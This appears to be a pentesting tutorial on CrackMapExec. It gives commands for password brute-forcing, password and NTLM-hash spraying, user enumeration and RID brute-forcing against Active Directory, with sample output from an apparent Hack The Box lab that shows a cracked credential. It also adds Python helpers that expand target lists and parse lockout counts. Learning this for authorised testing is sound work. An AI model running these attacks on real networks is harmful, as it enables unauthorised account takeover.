Crackmapexec (CME)
CrackMapExec (a.k.a. CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve its functionality, which allows it to evade most endpoint protection/IDS/IPS solutions.
Usage
Running cme --help will list the general options and the protocols that are available (notice the 'protocols' section below):
#~ crackmapexec --help
usage: cme [-h] [-v] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL]
[--darrell] [--verbose]
{http,smb,mssql} ...
A swiss army knife for pentesting networks
Forged by @byt3bl33d3r using the powah of dank memes
Version: 4.0.0dev
Codename: 'Sercurty'
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-t THREADS set how many concurrent threads to use (default: 100)
--timeout TIMEOUT max timeout in seconds of each thread (default: None)
--jitter INTERVAL sets a random delay between each connection (default: None)
--darrell give Darrell a hand
--verbose enable verbose output
protocols:
available protocols
{http,smb,mssql}
http own stuff using HTTP(S)
smb own stuff using SMB and/or Active Directory
mssql own stuff using MSSQL and/or Active Directory
Target Formats
Every protocol accepts targets as CIDR notation, single IP addresses, IP ranges, hostnames, a file containing a list of targets, or any combination of these:
crackmapexec <protocol> ms.evilcorp.org
crackmapexec <protocol> 192.168.1.0 192.168.0.2
crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> 192.168.1.0-28 10.0.0.1-67
crackmapexec <protocol> ~/targets.txt
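As an added illustration (not code from CME itself), a small Python expander for the target formats listed above. It models only IPv4 ranges; the full "a.b.c.d-e.f.g.h" range form, the skipping of blank and "#" lines in a target file, and the handling of /31 and /32 blocks are assumptions, since the page only shows the shorthand forms.

```python
import ipaddress
import os
import re
from typing import Iterable, List

# Range form: "192.168.1.0-28" (last octet only, as on the page) or full "10.0.0.1-10.0.0.67" (assumed).
_RANGE_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})-((?:\d{1,3}\.){3}\d{1,3}|\d{1,3})$")
_DOTTED_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
_HOST_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def expand_target(spec: str) -> List[str]:
    """Expand one target spec into concrete hosts; raises ValueError if it is unparseable."""
    spec = spec.strip()
    if not spec or spec.startswith("#"):                 # blank / comment line in a target file (assumed)
        return []
    path = os.path.expanduser(spec)
    if os.path.isfile(path):                             # file of specs, one per line, expanded recursively
        with open(path, encoding="utf-8") as fh:
            return expand_targets(fh)
    if "/" in spec:                                      # CIDR block
        net = ipaddress.ip_network(spec, strict=False)
        # hosts() drops network/broadcast; for /31 and /32 every address is a candidate (assumed)
        return [str(h) for h in (net.hosts() if net.prefixlen < net.max_prefixlen - 1 else net)]
    m = _RANGE_RE.match(spec)
    if m:                                                # inclusive IPv4 range
        start = ipaddress.IPv4Address(m.group(1))
        end_txt = m.group(2)
        if "." not in end_txt:                           # shorthand: end replaces start's last octet
            end_txt = str(start).rsplit(".", 1)[0] + "." + end_txt
        end = ipaddress.IPv4Address(end_txt)
        if end < start:
            raise ValueError(f"range end precedes start: {spec}")
        return [str(ipaddress.IPv4Address(i)) for i in range(int(start), int(end) + 1)]
    if _DOTTED_RE.match(spec):                           # single IPv4; ip_address() rejects bad octets
        return [str(ipaddress.ip_address(spec))]
    if _HOST_RE.match(spec):                             # hostname / FQDN, left for DNS to resolve
        return [spec]
    raise ValueError(f"unrecognised target spec: {spec!r}")


def expand_targets(specs: Iterable[str]) -> List[str]:
    """Expand CLI arguments or file lines, de-duplicating while keeping first-seen order."""
    seen, out = set(), []
    for spec in specs:
        for host in expand_target(spec):
            if host not in seen:
                seen.add(host)
                out.append(host)
    return out
```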
Using Credentials
Every protocol supports using credentials in one form or another. For details on using credentials with a specific protocol, see the appropriate wiki section. Generally speaking, to use credentials, you can run the following commands:
crackmapexec <protocol> <target(s)> -u username -p password
ℹ️ When using usernames or passwords that contain special symbols, wrap them in single quotes to make your shell interpret them as a string.
Example:
crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'
Brute force login with wordlists
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
ℹ️ By default CME will exit after the first successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found, which is useful for spraying a single password against a large user list.
Example:
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce --continue-on-success
Enumerating with crackmapexec
Here are some common commands to use when enumerating with crackmapexec:
Find users
┌──(kali㉿kali)-[~/htb/zephyr/192.168.210.10]
└─$ crackmapexec smb 192.168.210.10 -u users.txt -p passwords.txt
SMB 192.168.210.10 445 ZPH-SVRDC01 [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRDC01) (domain:zsm.local) (signing:True) (SMBv1:False)
SMB 192.168.210.10 445 ZPH-SVRDC01 [-] zsm.local\marcus:Mail4Painter2022!@# STATUS_LOGON_FAILURE
SMB 192.168.210.10 445 ZPH-SVRDC01 [-] zsm.local\marcus:P@ssw0rd STATUS_LOGON_FAILURE
SMB 192.168.210.10 445 ZPH-SVRDC01 [-] zsm.local\marcus:!QAZ1qaz STATUS_LOGON_FAILURE
SMB 192.168.210.10 445 ZPH-SVRDC01 [+] zsm.local\marcus:!QAZ2wsx
With credentials we can get all users in the domain:
crackmapexec smb zsm.local -u marcus -p password123 --users
SMB zsm.local 445 ZPH-SVRDC01 [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRDC01) (domain:zsm.local) (signing:True) (SMBv1:False)
SMB zsm.local 445 ZPH-SVRDC01 [+] zsm.local\jamie:P@ssw0rd
SMB zsm.local 445 ZPH-SVRDC01 [+] Enumerated domain user(s)
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\jamie badpwdcount: 0 desc:
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\ca_svc badpwdcount: 0 desc:
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\marcus badpwdcount: 6 desc:
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\paul.williams badpwdcount: 0 desc:
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\daniel.morris badpwdcount: 0 desc:
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\krbtgt badpwdcount: 0 desc: Key Distribution Center Service Account
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\Guest badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\Administrator badpwdcount: 3 desc: Built-in account for administering the computer/domain
Use --rid-brute to brute-force RIDs and list all principals in the domain:
crackmapexec smb zsm.local -u <user> -p <password> --rid-brute 10000
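The badpwdcount column in the --users listing is the footprint a spray leaves on each account (marcus shows 6 after the failed attempts above), and it is the counter an AD lockout threshold is compared against. As an added example, not CME's own code, a Python parser for the SMB output format shown on this page that tallies login results per account and flags accounts whose badpwdcount meets a threshold; the column layout is inferred from the listings above, and the sample lines are a subset of them.

```python
import re
from typing import Dict, List, Optional

# A CME result line: PROTO TARGET PORT HOSTNAME [tag] body  (tag absent on --users listing rows).
_LINE_RE = re.compile(r"^(?P<proto>[A-Z]+)\s+(?P<target>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
                      r"(?:(?P<tag>\[[*+\-!]\])\s+)?(?P<body>.*)$")
# Login attempt body: DOMAIN\user:secret [STATUS_...]; secrets containing spaces are not handled.
_LOGIN_RE = re.compile(r"^(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<secret>.*?)(?:\s+(?P<status>STATUS_\w+))?$")
# --users listing body: DOMAIN\user badpwdcount: N desc: text
_USER_RE = re.compile(r"^(?P<domain>[^\\\s]+)\\(?P<user>\S+)\s+badpwdcount:\s*(?P<bad>\d+)\s+desc:\s*(?P<desc>.*)$")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one output line into its fields; None if the line is not CME result output."""
    m = _LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def login_results(lines: List[str]) -> Dict[str, Dict[str, int]]:
    """Per account (lower-cased DOMAIN\\user): number of [-] failures and [+] successes."""
    stats: Dict[str, Dict[str, int]] = {}
    for raw in lines:
        rec = parse_line(raw)
        if rec is None or rec["tag"] not in ("[+]", "[-]"):
            continue
        m = _LOGIN_RE.match(rec["body"])
        if m is None:            # e.g. "[+] Enumerated domain user(s)" is not a login result
            continue
        acct = stats.setdefault(f"{m['domain']}\\{m['user']}".lower(), {"failures": 0, "successes": 0})
        acct["successes" if rec["tag"] == "[+]" else "failures"] += 1
    return stats


def users_at_or_above(lines: List[str], threshold: int) -> Dict[str, int]:
    """badpwdcount per account from a --users listing, keeping those at or above threshold."""
    flagged: Dict[str, int] = {}
    for raw in lines:
        rec = parse_line(raw)
        m = _USER_RE.match(rec["body"]) if rec and rec["tag"] is None else None
        if m and int(m["bad"]) >= threshold:
            flagged[f"{m['domain']}\\{m['user']}"] = int(m["bad"])
    return flagged


# Lines taken from the listings above (a subset of the page's output, not a full CME run).
SAMPLE = r"""
SMB 192.168.210.10 445 ZPH-SVRDC01 [-] zsm.local\marcus:P@ssw0rd STATUS_LOGON_FAILURE
SMB 192.168.210.10 445 ZPH-SVRDC01 [-] zsm.local\marcus:!QAZ1qaz STATUS_LOGON_FAILURE
SMB 192.168.210.10 445 ZPH-SVRDC01 [+] zsm.local\marcus:!QAZ2wsx
SMB zsm.local 445 ZPH-SVRDC01 [+] Enumerated domain user(s)
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\jamie badpwdcount: 0 desc:
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\marcus badpwdcount: 6 desc:
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\Administrator badpwdcount: 3 desc: Built-in account for administering the computer/domain
""".strip().splitlines()
```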